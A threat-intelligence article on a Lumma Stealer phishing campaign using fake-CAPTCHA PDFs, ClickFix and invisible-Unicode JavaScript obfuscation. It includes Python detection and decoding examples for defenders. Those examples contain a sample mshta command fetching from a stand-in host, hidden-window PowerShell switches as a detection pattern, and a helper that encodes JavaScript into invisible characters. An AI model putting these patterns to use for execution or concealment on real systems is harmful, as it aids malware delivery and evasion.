Unmasking a Sophisticated Phishing Campaign Distributing Lumma Stealer Malware


Introduction

Cybersecurity researchers have recently uncovered an extensive phishing campaign exploiting fake CAPTCHA images embedded in PDF documents. These malicious files, hosted on Webflow's content delivery network (CDN), serve as a vehicle for delivering the Lumma Stealer malware. The campaign, which employs search engine optimization (SEO) techniques to lure victims, has targeted thousands of users across multiple sectors globally.

Widespread Distribution of Phishing PDFs

Netskope Threat Labs has identified 260 unique domains hosting over 5,000 phishing PDF files. These documents redirect victims to malicious websites designed to steal sensitive information or install malware. Attackers leverage SEO tactics to ensure their malicious content appears prominently in search engine results, increasing the likelihood of unsuspecting users clicking on them.

Unlike conventional phishing campaigns that primarily target credit card information, this attack incorporates deceptive CAPTCHAs, tricking victims into executing harmful PowerShell commands. This process ultimately leads to the deployment of the Lumma Stealer malware, posing a significant cybersecurity threat.

Impact and Targeted Sectors

Since mid-2024, this phishing operation has affected over 1,150 organizations and compromised more than 7,000 users. The attacks have predominantly targeted victims in North America, Asia, and Southern Europe, with industries such as technology, financial services, and manufacturing being the primary focus.

Analysis of the compromised domains reveals that most phishing PDFs are associated with Webflow, followed by platforms such as GoDaddy, Strikingly, Wix, and Fastly. In an effort to increase their reach, attackers have also uploaded these PDFs to legitimate online repositories, including PDFCOFFEE, PDF4PRO, PDFBean, and the Internet Archive. By embedding fraudulent CAPTCHA images, these PDFs deceive users into clicking malicious links that either steal credit card details or trigger the download of Lumma Stealer.

Execution Tactics and Deceptive Techniques

A notable aspect of this campaign is the attackers' use of a fake CAPTCHA verification page. This page employs a technique known as ClickFix to manipulate victims into executing an MSHTA command. This command subsequently runs a PowerShell script that installs the Lumma Stealer malware onto the victim’s system.
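The execution chain above (a fake CAPTCHA page coaxes the victim into running MSHTA, which in turn launches PowerShell) leaves a distinctive parent/child process relationship that endpoint telemetry can catch. The following is an added detection example, not code from Netskope's report or from any product: it scores constructed process-creation events (Sysmon Event ID 1 style fields) and flags PowerShell spawned by mshta.exe, mshta.exe started with a remote URL, and hidden-window or encoded-command switches. The field names, the weights and the sample command lines are assumptions chosen for illustration.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str


POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Switches that hide the console, pass an encoded script or skip the profile;
# they only add weight, they are not an alert on their own.
SUSPICIOUS_PS_ARGS = re.compile(
    r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)\b|nop(?:rofile)?\b)"
)
URL_ARG = re.compile(r"(?i)\bhttps?://")

# Constructed sample events (not taken from the report); paths and command lines
# are illustrative only. Events 1 and 2 model the ClickFix chain, 3 and 4 are benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/verify"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "Write-Host constructed-sample"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-ChildItem"),
    ProcEvent(r"C:\Program Files\Internet Explorer\iexplore.exe",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\app\local.hta"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent == "mshta.exe" and child in POWERSHELL:
        score += 70
        reasons.append("powershell spawned by mshta.exe (ClickFix-style chain)")
    if child == "mshta.exe" and URL_ARG.search(ev.command_line):
        score += 50
        reasons.append("mshta.exe launched with a remote URL")
    if child in POWERSHELL and SUSPICIOUS_PS_ARGS.search(ev.command_line):
        score += 20
        reasons.append("powershell run with hidden-window/encoded/no-profile switches")
    return score, reasons


def detect(events, threshold: int = 50):
    """Return (event, score, reasons) for every event at or above the alert threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(f"[{score}] {basename(ev.parent_image)} -> {basename(ev.image)}: {'; '.join(reasons)}")
```

Run against the constructed events, the two mshta-related records alert (scores 50 and 90) while the ordinary PowerShell and local HTA launches stay silent. The weights are deliberately conservative so that a lone `-w hidden` does not page anyone; the parent/child pairing is what carries the signal.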

Recent observations indicate that Lumma Stealer is being disseminated under the guise of Roblox games and a cracked version of the Total Commander tool for Windows. YouTube videos, often posted from compromised accounts, serve as another distribution channel, redirecting users to infected websites.

According to cybersecurity firm Silent Push, malicious links and infected files are often embedded within YouTube video descriptions, comments, or direct downloads. As a countermeasure, users are advised to exercise caution when engaging with unverified YouTube content, particularly when prompted to download files or click on external links.

Lumma Stealer's Role in the Cybercrime Ecosystem

Further investigations have revealed that stolen credentials and logs from Lumma Stealer infections are being shared on a relatively new hacking forum, Leaky[.]pro, which emerged in December 2024. Lumma Stealer operates under the malware-as-a-service (MaaS) model, allowing cybercriminals to exploit compromised Windows systems for financial gain.

In early 2024, the malware’s operators introduced an integration with GhostSocks, a proxy malware developed in Golang. This addition enables attackers to utilize a SOCKS5 backconnect feature, enhancing their ability to bypass geographic restrictions and IP-based security measures. Such capabilities are particularly valuable for financial fraud, as they facilitate unauthorized access to high-value targets, including financial institutions.

Emerging Threats and Evolution of Attack Techniques

The recent rise of similar stealer malware, including Vidar and Atomic macOS Stealer (AMOS), demonstrates the continued evolution of cyber threats. These malware variants have been distributed using the ClickFix technique, often exploiting interest in artificial intelligence (AI) tools such as the DeepSeek AI chatbot to deceive users.

Additionally, new phishing techniques have been observed involving JavaScript obfuscation with invisible Unicode characters. This method, first documented in October 2024, uses Hangul half-width (U+FFA0) and full-width (U+3164) characters to represent binary values. By converting ASCII characters into these Unicode symbols, attackers effectively evade detection while executing malicious JavaScript payloads.
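Because the two filler characters named above render as blank, a reviewer looking at the script sees an apparently empty string literal while the bits of the real payload sit inside it. The following is an added analysis example, not code from Juniper's write-up: it locates long runs made up solely of U+FFA0 and U+3164 in a JavaScript source, turns each run back into bytes, and keeps whichever of the two possible bit assignments yields printable ASCII. Which character stands for 0 and which for 1 is not stated on the page, so the decoder tries both; the sample script is constructed here, and `_hide` exists only to build it.

```python
# Invisible Hangul filler characters described in the text
HALF = "\uffa0"   # HALFWIDTH HANGUL FILLER
FULL = "\u3164"   # HANGUL FILLER
FILLERS = {HALF, FULL}


def find_filler_runs(text: str, min_len: int = 8):
    """Return (start, end) spans of runs consisting solely of the two filler characters."""
    runs, i, n = [], 0, len(text)
    while i < n:
        if text[i] in FILLERS:
            j = i
            while j < n and text[j] in FILLERS:
                j += 1
            if j - i >= min_len:          # ignore stray single fillers
                runs.append((i, j))
            i = j
        else:
            i += 1
    return runs


def decode_run(run: str, zero: str, one: str) -> bytes:
    """Interpret each filler as one bit under the given mapping and pack 8 bits per byte."""
    bits = "".join("0" if ch == zero else "1" for ch in run)
    usable = len(bits) - len(bits) % 8     # drop a trailing partial byte
    return bytes(int(bits[k:k + 8], 2) for k in range(0, usable, 8))


def _is_printable(data: bytes) -> bool:
    return bool(data) and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def recover_payload(text: str):
    """For every filler run, try both bit mappings and keep the one that decodes to ASCII.

    Returns a list of (start, end, decoded_text) for runs that decode cleanly.
    """
    results = []
    for s, e in find_filler_runs(text):
        run = text[s:e]
        for zero, one in ((HALF, FULL), (FULL, HALF)):   # mapping is an assumption; try both
            data = decode_run(run, zero, one)
            if _is_printable(data):
                results.append((s, e, data.decode("ascii")))
                break
    return results


def _hide(ascii_text: str, zero: str = HALF, one: str = FULL) -> str:
    """Build the constructed sample only: map each byte's 8 bits onto the two fillers."""
    return "".join(one if bit == "1" else zero
                   for ch in ascii_text for bit in format(ord(ch), "08b"))


# Constructed sample script: the string literal looks empty in an editor but carries
# a benign alert() call encoded in filler characters.
SAMPLE_JS = 'var p = "' + _hide('alert("constructed sample")') + '";\n'


if __name__ == "__main__":
    for start, end, payload in recover_payload(SAMPLE_JS):
        print(f"filler run at {start}-{end} ({end - start} chars) decodes to: {payload!r}")
```

The run length is a useful first-pass indicator on its own: eight fillers per hidden byte means even a short payload produces hundreds of consecutive blank code points, which ordinary JavaScript never contains. The printable-ASCII check keeps the decoder from reporting noise when the wrong bit assignment is tried.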

Juniper Threat Labs has noted that these attacks are highly sophisticated, often incorporating non-public information to personalize phishing attempts. Moreover, the malicious JavaScript is designed to detect debugging attempts and abort execution by redirecting the user to a benign website if any analysis is detected.

Conclusion

The discovery of this phishing campaign highlights the growing complexity of cyber threats and the adaptability of threat actors. By leveraging SEO manipulation, social engineering techniques, and advanced obfuscation methods, attackers are continuously refining their tactics to evade detection. Organizations and individual users must remain vigilant, adopting robust cybersecurity measures such as verifying sources, scrutinizing search engine results, and exercising caution when engaging with online content.

The emergence of platforms like Leaky[.]pro further underscores the importance of proactive threat intelligence and collaboration among cybersecurity professionals to mitigate evolving cyber risks. Staying informed and implementing best practices can help minimize exposure to these ever-growing digital threats.

